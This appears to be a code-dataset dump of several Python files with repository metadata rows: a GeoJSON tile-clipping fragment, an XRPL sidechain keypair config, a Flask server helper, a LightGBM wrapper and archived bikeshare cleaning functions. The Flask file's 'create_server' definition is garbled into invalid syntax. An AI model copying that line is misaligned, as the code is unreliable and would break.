        if box(*mercantile.bounds(tile)).intersects(geometry)
    ]
def clip_geometry_to_tile(geometry, tile):
    """Split *geometry* along the tile boundary and return the pieces
    that lie inside the tile.
    """
    tile_polygon = box(*mercantile.bounds(tile))
    # split() yields a geometry collection with pieces on both sides
    # of the tile boundary; keep only those contained by the tile.
    pieces = split(geometry, tile_polygon)
    return [piece for piece in pieces if tile_polygon.contains(piece)]
if __name__ == '__main__':
    cut_geojson()  # CLI entry point; argument parsing is handled by click
| 29.31068 | 79 | 0.623716 | 0 | 0 | 0 | 0 | 2,180 | 0.722093 | 0 | 0 | 581 | 0.192448 |
e2e918a6f7ddc309c080d77ca6f1ab09dd2b6ed5 | 2,262 | py | Python | slk/config/network.py | QCloud-DevOps/sidechain-launch-kit | ee41524b65042b2f33ded4997fb34cea9e4e560c | [
"ISC"
] | 1 | 2021-12-12T02:15:37.000Z | 2021-12-12T02:15:37.000Z | slk/config/network.py | QCloud-DevOps/sidechain-launch-kit | ee41524b65042b2f33ded4997fb34cea9e4e560c | [
"ISC"
] | null | null | null | slk/config/network.py | QCloud-DevOps/sidechain-launch-kit | ee41524b65042b2f33ded4997fb34cea9e4e560c | [
"ISC"
] | null | null | null | from __future__ import annotations
from typing import List, Optional
from xrpl import CryptoAlgorithm
from xrpl.core.addresscodec import encode_account_public_key, encode_node_public_key
from xrpl.core.keypairs import derive_keypair, generate_seed
from xrpl.wallet import Wallet
from slk.config.helper_classes import Keypair, Ports
class Network:
    """A network of validator nodes for a locally launched chain.

    Attributes:
        num_nodes: number of validator nodes in the network.
        validator_keypairs: one freshly generated keypair per node.
        ports: one Ports block per node, offset from start_cfg_index.
    """

    def __init__(self: Network, num_nodes: int, start_cfg_index: int) -> None:
        self.num_nodes = num_nodes
        self.validator_keypairs = self._generate_node_keypairs()
        self.ports = [
            Ports(start_cfg_index + offset) for offset in range(self.num_nodes)
        ]

    def _generate_node_keypairs(self: Network) -> List[Keypair]:
        """Generate one secp256k1 keypair per node, suitable for validator keys."""
        keypairs = []
        for _ in range(self.num_nodes):
            seed = generate_seed(None, CryptoAlgorithm.SECP256K1)
            public_key, _private_key = derive_keypair(seed, True)
            keypairs.append(
                Keypair(
                    public_key=encode_node_public_key(bytes.fromhex(public_key)),
                    secret_key=seed,
                    account_id=None,
                )
            )
        return keypairs
class SidechainNetwork(Network):
    """A sidechain network: a Network whose nodes are run by federators.

    Attributes:
        num_federators: number of federators on the sidechain.
        federator_keypairs: one ed25519 keypair per federator.
        main_account: secp256k1 wallet for the sidechain's main account.
    """

    def __init__(
        self: SidechainNetwork,
        num_federators: int,
        start_cfg_index: int,
        num_nodes: Optional[int] = None,
    ) -> None:
        # By default every node is a federator node.
        super().__init__(num_nodes or num_federators, start_cfg_index)
        self.num_federators = num_federators
        self.federator_keypairs = self._generate_federator_keypairs()
        self.main_account = Wallet.create(CryptoAlgorithm.SECP256K1)

    def _generate_federator_keypairs(self: SidechainNetwork) -> List[Keypair]:
        """Generate one ed25519 keypair per federator, suitable for federator keys."""
        keypairs = []
        for _ in range(self.num_federators):
            wallet = Wallet.create(crypto_algorithm=CryptoAlgorithm.ED25519)
            keypairs.append(
                Keypair(
                    public_key=encode_account_public_key(
                        bytes.fromhex(wallet.public_key)
                    ),
                    secret_key=wallet.seed,
                    account_id=wallet.classic_address,
                )
            )
        return keypairs
| 36.483871 | 84 | 0.637931 | 1,921 | 0.849248 | 0 | 0 | 0 | 0 | 0 | 0 | 102 | 0.045093 |
e2e99f84c3210071c41b2ad1656cb8ddb4605446 | 5,132 | py | Python | realpyserver/server.py | MartinChristiaan/realpy | b53c53b3d40298d1c20118d770f52e9d8402c634 | [
"MIT"
] | null | null | null | realpyserver/server.py | MartinChristiaan/realpy | b53c53b3d40298d1c20118d770f52e9d8402c634 | [
"MIT"
] | null | null | null | realpyserver/server.py | MartinChristiaan/realpy | b53c53b3d40298d1c20118d770f52e9d8402c634 | [
"MIT"
] | null | null | null | from flask import Flask,Response
from flask import render_template
import os
from os import path,system
from flask import request
import json
from flask_cors import CORS
import shutil
# Model Definition
import math
import serialization
import numpy as np
import types
from enum import Enum
import video_capture
#pathToPython = "C:\\Users\\marti\\Source\\Repos\\VideoHeartbeatInterface\\src\\pythonTypes.fs"
def create_type_provider(classlibrary, pathToPython):
    """Write an F# source file (module ``PythonTypes``) describing the
    attributes of every object in *classlibrary*.

    For each attribute found via ``dir()`` one ``let`` binding is emitted:
    bound methods become ``ClassName*MethodName`` pairs, Enum-valued
    attributes become ``ClassName*EnumName`` pairs plus an ``_options``
    list of member names, and everything else becomes a
    ``ClassName*FieldName`` pair.

    Args:
        classlibrary: instances whose attributes should be exported.
        pathToPython: path of the .fs file to (over)write.
    """
    lines = ["module PythonTypes \n"]
    lines += ["type ClassName = string \n"]
    lines += ["type FieldName = string \n"]
    lines += ["type EnumName = FieldName \n"]
    lines += ["type EnumOptions = string list \n"]
    lines += ["type MethodName = FieldName \n"]
    for c in classlibrary:
        classname = type(c).__name__
        for field in dir(c):
            attr = getattr(c, field)
            # isinstance instead of `type(...) ==` (idiomatic type check).
            if isinstance(attr, types.MethodType):
                lines += ["let " + classname + "_" + str(field) + " : ClassName*MethodName = \"" + classname + "\",\"" + str(field) + "\" \n"]
            elif isinstance(attr, Enum):
                # NOTE(review): dropping the last 4 entries of dir() assumes a
                # fixed set of trailing dunder attributes on Enum classes;
                # this is fragile across Python versions — verify.
                choices = "\";\"".join(dir(type(attr))[:-4])
                lines += ["let " + classname + "_" + str(field) + " : ClassName*EnumName = \"" + classname + "\",\"" + str(field) + "\" \n"]
                lines += ["let " + classname + "_" + str(field) + "_options : EnumOptions = [\"" + choices + "\"] \n"]
            else:
                lines += ["let " + classname + "_" + str(field) + " : ClassName*FieldName = \"" + classname + "\",\"" + str(field) + "\" \n"]
    # Fix: use a context manager so the file is flushed and closed even on
    # error — the original never closed the handle. (A stray debug print of
    # the enum choices was also removed.)
    with open(pathToPython, "w") as f:
        f.writelines(lines)
def setup_template(pathToClient, use_camera):
    """Ensure the PyTypeClient template exists at *pathToClient*.

    Copies the bundled ``PyTypeClient`` directory (relative to the current
    working directory) when the destination does not exist yet. When
    *use_camera* is false, one line is removed from the template's
    ``public/index.html`` to strip the camera feed element.

    Args:
        pathToClient: destination directory for the client template.
        use_camera: keep the camera element in index.html when true.
    """
    # Idiom fix: guard clause instead of `if exists: pass / else: copy`.
    if not os.path.exists(pathToClient):
        print("copying")
        shutil.copytree("PyTypeClient", pathToClient)
    if not use_camera:
        htmlfile = pathToClient + "/public/index.html"
        # Context managers guarantee the handles are closed even on error.
        with open(htmlfile, 'r') as f:
            lines = f.readlines()
        # NOTE(review): hard-coded index — assumes the camera element sits
        # on line 26 of the template's index.html; confirm if the template
        # ever changes.
        del lines[25]
        with open(htmlfile, 'w') as f:
            f.writelines(lines)
def create_server(classlibrary,main,pathToPython=None,use_camera=True) if False else None
e2eafd10b9a42cf374bccc91017038c2fb7bae6a | 1,526 | py | Python | model_lgb_hakubishin_20200317/src/models/model_lightgbm.py | wantedly/recsys2020-challenge | d9967860cc4767380d28d2ed7af00d467cc6941a | [
"Apache-2.0"
] | 35 | 2020-06-23T05:33:50.000Z | 2021-11-22T08:22:42.000Z | model_lgb_hakubishin_20200317/src/models/model_lightgbm.py | wantedly/recsys2020-challenge | d9967860cc4767380d28d2ed7af00d467cc6941a | [
"Apache-2.0"
] | 15 | 2020-12-28T05:31:06.000Z | 2021-01-22T06:49:28.000Z | model_lgb_hakubishin_20200317/src/models/model_lightgbm.py | wantedly/recsys2020-challenge | d9967860cc4767380d28d2ed7af00d467cc6941a | [
"Apache-2.0"
] | 2 | 2020-06-30T10:02:05.000Z | 2021-05-22T09:57:19.000Z | import lightgbm as lgb
from .model import Base_Model
from src.utils import Pkl
class Model_LightGBM(Base_Model):
    """LightGBM implementation of Base_Model.

    Relies on attributes provided by the base class / runner:
    ``self.params`` (with ``model_params`` and ``train_params`` dicts),
    ``self.model_output_dir`` and ``self.run_fold_name``.
    """

    def train(self, x_trn, y_trn, x_val, y_val):
        """Fit a booster; validation data is used only when x_val is given."""
        model_params = self.params['model_params']
        train_params = self.params['train_params']
        train_set = lgb.Dataset(x_trn, label=y_trn)
        if x_val is None:
            # No validation split: plain training run.
            self.model = lgb.train(
                params=model_params,
                train_set=train_set,
                **train_params
            )
        else:
            valid_set = lgb.Dataset(x_val, label=y_val, reference=train_set)
            self.model = lgb.train(
                params=model_params,
                train_set=train_set,
                valid_sets=[train_set, valid_set],
                valid_names=['train', 'valid'],
                **train_params
            )

    def predict(self, x):
        """Predict with the trained booster."""
        return self.model.predict(x)

    def get_feature_importance(self):
        """Per-feature importance measured by total gain."""
        return self.model.feature_importance(importance_type='gain')

    def get_best_iteration(self):
        """Best boosting round found during training."""
        return self.model.best_iteration

    def save_model(self):
        """Pickle the booster to <model_output_dir>/<run_fold_name>.pkl."""
        model_path = self.model_output_dir / f'{self.run_fold_name}.pkl'
        Pkl.dump(self.model, model_path)

    def load_model(self):
        """Restore the booster from <model_output_dir>/<run_fold_name>.pkl."""
        model_path = self.model_output_dir / f'{self.run_fold_name}.pkl'
        self.model = Pkl.load(model_path)
| 29.921569 | 72 | 0.60616 | 1,444 | 0.946265 | 0 | 0 | 0 | 0 | 0 | 0 | 156 | 0.102228 |
e2eba50e1eae9762f3a58281f7c829de6c02f619 | 4,031 | py | Python | cabi/archived/ebikes.py | jmillerbrooks/capital_bikeshare | 72023f9121068098e736f69605edff68bc2adff2 | [
"MIT"
] | null | null | null | cabi/archived/ebikes.py | jmillerbrooks/capital_bikeshare | 72023f9121068098e736f69605edff68bc2adff2 | [
"MIT"
] | null | null | null | cabi/archived/ebikes.py | jmillerbrooks/capital_bikeshare | 72023f9121068098e736f69605edff68bc2adff2 | [
"MIT"
] | null | null | null | ### DEPRECATE THESE? OLD VERSIONS OF CLEANING FUNCTIONS FOR JUST EBIKES
### NO LONGER WORKING WITH THESE
import pandas as pd
import numpy as np
from shapely.geometry import Point
import geopandas as gpd
from cabi.utils import which_anc, station_anc_dict
from cabi.get_data import anc_gdf
gdf = anc_gdf()
anc_dict = station_anc_dict()
station_keys = anc_dict.keys()
## NEEDS WORK!! FIX GET_DATA MODULE SO THAT LOAD CLEAN DOCKLESS CAN JUST CALL FROM THERE
def load_clean_dockless():
    """Load the raw dockless (e-bike) pickle, clean it, and drop the
    constant `rideable_type` column.

    NOTE(review): `clean_frame` is not defined or imported in this archived
    module — calling this will raise NameError as-is; verify before use.
    """
    # FIX THIS CALL GET_DATA MODULE
    df = pd.read_pickle('../data/wip/raw_dockless.pkl')
    cleaned_ebikes = clean_frame(df)
    cleaned_ebikes = cleaned_ebikes.drop('rideable_type', axis=1)
    return cleaned_ebikes
def load_geo_ebikes():
    """Load the cleaned dockless trips and convert them to geo form.

    NOTE(review): `to_geo` is not defined or imported in this archived
    module — calling this will raise NameError as-is; verify before use.
    """
    df = load_clean_dockless()
    geo_ebikes = to_geo(df)
    return geo_ebikes
def load_clean_full():
    """Load and clean the full April–July raw pickle.

    TODO: make this extensible to more months (original author note).

    NOTE(review): `clean_frame` is not defined or imported in this archived
    module — calling this will raise NameError as-is; verify before use.
    """
    df = pd.read_pickle('../data/wip/raw_apr_to_jul_df.pkl')
    cleaned_full = clean_frame(df)
    return cleaned_full
def geo_longer(df):
    """Melt `started_at`/`ended_at` into one time-indexed long frame.

    Each input trip becomes two rows — one tagged 'start' and one tagged
    'end' in the new `start_end` column — indexed and sorted by the event
    time, so the output has exactly twice as many rows as the input.
    """
    # Every column except the two timestamps survives the melt as an id var.
    id_columns = [c for c in df.columns if c not in ('started_at', 'ended_at')]
    renamed = df.rename(columns={'started_at': 'start', 'ended_at': 'end'})
    melted = renamed.melt(
        id_vars=id_columns,
        value_vars=['start', 'end'],
        var_name='start_end',
        value_name='time',
    )
    return melted.set_index('time').sort_index()
def load_long_geo():
    """Load the geo e-bike frame and reshape it to long, time-indexed form."""
    return geo_longer(load_geo_ebikes())
def load_long_geo_full():
    """Long-form frame intended for the *full* dataset.

    NOTE(review): the body is identical to `load_long_geo` — it loads the
    dockless-only data via `load_geo_ebikes` and never uses
    `load_clean_full`. This looks like a copy-paste bug; left as-is because
    the intended loader is unclear from this file.
    """
    df = load_geo_ebikes()
    long_geo = geo_longer(df)
    return long_geo
def anc_frame(df):
    """Return *df* without the station-name columns (ANC-level view)."""
    return df.drop(columns=['start_station_name', 'end_station_name'])
def load_long_anc():
    """Long-form frame with the station-name columns removed."""
    return anc_frame(load_long_geo())
# NEEDS WORK!! FIX DOCSTRING!! GENERALIZE TO ANY LOCATION COL (station etc.)
# This is likely uneccesary now that we have a more generalized long df function
def net_gain_loss_anc(ANC_name, df):
    """Per-row net bike change for one ANC.

    Returns an array with -1 for a ride departing from the ANC, +1 for a
    ride arriving into it, and 0 for rows that do not touch it. Expects
    columns `start_end` ('start'/'end'), `ANC_start` and `ANC_end`.
    """
    is_start = df['start_end'] == 'start'
    is_end = df['start_end'] == 'end'
    from_anc = df['ANC_start'] == ANC_name
    to_anc = df['ANC_end'] == ANC_name
    # np.select takes the first matching condition per row, so order matters.
    conditions = [
        is_start & from_anc,      # departure from this ANC
        is_end & to_anc,          # arrival into this ANC
        ~from_anc & ~to_anc,      # ride never touched this ANC
        is_end & ~to_anc,
        is_start & ~from_anc,
    ]
    values = [-1, 1, 0, 0, 0]
    return np.select(conditions, values)
def plus_minus_anc_frame(df):
    """Per-ANC net gain/loss columns for every event row in *df*.

    Builds one column per ANC_ID found in the module-level `gdf` (loaded
    from cabi.get_data at import time), each holding the -1/0/+1 series
    produced by `net_gain_loss_anc`, indexed like *df*.

    TODO (original author note): generalize to accept other location
    columns (e.g. stations) and remove the dependency on the global `gdf`.
    """
    # Create dictionary of ancs (keys) and series of plus minus values returned from net_gain_loss_anc (values)
    # for each unique ANC_ID
    plus_minus_dict = {anc: net_gain_loss_anc(anc, df) \
        for anc in \
        list(gdf.ANC_ID)}
    # Convert dict to dataframe, index by the (time) index of long_anc_df passed
    anc_plus_minus_df = pd.DataFrame(plus_minus_dict, index=df.index)
    return anc_plus_minus_df
def load_plus_minus_anc():
    """Load the long ANC frame and compute the per-ANC plus/minus table."""
    return plus_minus_anc_frame(load_long_anc())
| 31.248062 | 111 | 0.65542 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,788 | 0.443562 |